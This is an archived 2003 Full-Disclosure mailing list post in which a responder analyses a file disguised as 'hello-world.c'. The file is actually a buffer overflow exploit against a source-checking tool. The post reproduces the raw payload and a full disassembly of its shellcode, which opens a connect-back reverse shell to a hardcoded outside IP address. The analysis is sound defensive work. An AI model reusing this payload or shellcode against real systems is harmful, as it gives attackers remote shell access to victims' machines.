| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Law15-F68Jf7zynrvDO00027683@hotmail.com>
From: davek_throwaway at hotmail.com (Dave Korn)
Subject: tripbid secure codes
----- Original Message -----
From: <auto94042@...hmail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Friday, June 27, 2003 6:25 AM
Subject: [Full-Disclosure] tripbid secure codes
>i post the thing to the vuln dev some days ago and get quite a big
respnose.
>not only do i get a heart 2 heat with n1xo reiman about portmon ! but
>some folks want me to look at the code they make, specially a 'hello-
>world.c' progie -> " holo, can you check my hello-world.c for strcpy
>?? securecode do the trick " <- paraphase the msg, i rm -rf / it since
>it make me anger and stress it !
>
>i am willing to try the secure code since the grep 'strcpy' is losing
>his thrills so i trick around with :
>[user@...alhost]$ ./securecode -s hello-world.c
Never ever EVER run an insecure program over arbitrary data you receive from
the net without checking it for safety first..... Let's look at this
hello-world.c before we run anything on it....
Z:\sploits-misc\targzip>type hello-world.c
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!?
?!? ?!? ?!? ?!? ?!? ?!?
?!??ииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииииии1?1?1?Q??Q??Q??QКъ???f?гК?1?1?QQh?b??fh????fQК???SWRКъ???f?г1?9?t?1????г1???К??г1???К????г1???К????г1?1?Phn/shh//biК?PSКъ???г1????г
Heh. Boy, did j00 get hax0red! Here's what's actually in that file:
$0000 - $00ff: 'A' x 256
$0100 - $011f: DWORD $bffff321 x 8
$0120 - $0378 $90 = NOP x 600
$0378 - $03fa: Binary shellcode
$03fb - $03fc: CR, LF
<EOF>
In other words, it's one very long line. Looks to me like the securecode
program reads each line of the .c file into a buffer that's only 256 bytes
long; this exploit fills it with 'A', then overwrites the return address on
the stack with a pointer into the NOP slide. Here's a disassembly of the
shellcode: note that offset 0 in this disassembly is offset $0370 in the
file. Sorry for not commenting this, but I don't speak linux asm; however I
can see a whole bunch of syscalls going on in there; the values in eax
should tell you whether anything nastier than a few mkdirs was done to
you...
Z:\sploits-misc\targzip>objdump -D --target=binary
hello-world2.bin --architectu
re=i386
hello-world2.bin: file format binary
objdump: hello-world2.bin: no symbols
Disassembly of section .data:
00000000 <.data>:
0: 90 nop
1: 90 nop
2: 90 nop
3: 90 nop
4: 90 nop
5: 90 nop
6: 90 nop
7: 90 nop
8: 90 nop
9: 31 c0 xor %eax,%eax
b: 31 db xor %ebx,%ebx
d: 31 c9 xor %ecx,%ecx
f: 51 push %ecx
10: b1 06 mov $0x6,%cl
12: 51 push %ecx
13: b1 01 mov $0x1,%cl
15: 51 push %ecx
16: b1 02 mov $0x2,%cl
18: 51 push %ecx
19: 89 e1 mov %esp,%ecx
1b: b3 01 mov $0x1,%bl
1d: b0 66 mov $0x66,%al
1f: cd 80 int $0x80
21: 89 c2 mov %eax,%edx
23: 31 c0 xor %eax,%eax
25: 31 c9 xor %ecx,%ecx
27: 51 push %ecx
28: 51 push %ecx
29: 68 d4 62 f7 cc push $0xccf762d4
2e: 66 68 b0 ef pushw $0xefb0
32: b1 02 mov $0x2,%cl
34: 66 51 push %cx
36: 89 e7 mov %esp,%edi
38: b3 10 mov $0x10,%bl
3a: 53 push %ebx
3b: 57 push %edi
3c: 52 push %edx
3d: 89 e1 mov %esp,%ecx
3f: b3 03 mov $0x3,%bl
41: b0 66 mov $0x66,%al
43: cd 80 int $0x80
45: 31 c9 xor %ecx,%ecx
47: 39 c1 cmp %eax,%ecx
49: 74 06 je 0x51
4b: 31 c0 xor %eax,%eax
4d: b0 01 mov $0x1,%al
4f: cd 80 int $0x80
51: 31 c0 xor %eax,%eax
53: b0 3f mov $0x3f,%al
55: 89 d3 mov %edx,%ebx
57: cd 80 int $0x80
59: 31 c0 xor %eax,%eax
5b: b0 3f mov $0x3f,%al
5d: 89 d3 mov %edx,%ebx
5f: b1 01 mov $0x1,%cl
61: cd 80 int $0x80
63: 31 c0 xor %eax,%eax
65: b0 3f mov $0x3f,%al
67: 89 d3 mov %edx,%ebx
69: b1 02 mov $0x2,%cl
6b: cd 80 int $0x80
6d: 31 c0 xor %eax,%eax
6f: 31 d2 xor %edx,%edx
71: 50 push %eax
72: 68 6e 2f 73 68 push $0x68732f6e
77: 68 2f 2f 62 69 push $0x69622f2f
7c: 89 e3 mov %esp,%ebx
7e: 50 push %eax
7f: 53 push %ebx
80: 89 e1 mov %esp,%ecx
82: b0 0b mov $0xb,%al
84: cd 80 int $0x80
86: 31 c0 xor %eax,%eax
88: b0 01 mov $0x1,%al
8a: cd 80 int $0x80
8c: 0d .byte 0xd
8d: 0a .byte 0xa
DaveK
_________________________________________________________________
Sign-up for a FREE BT Broadband connection today!
http://www.msn.co.uk/specials/btbroadband
Powered by blists - more mailing lists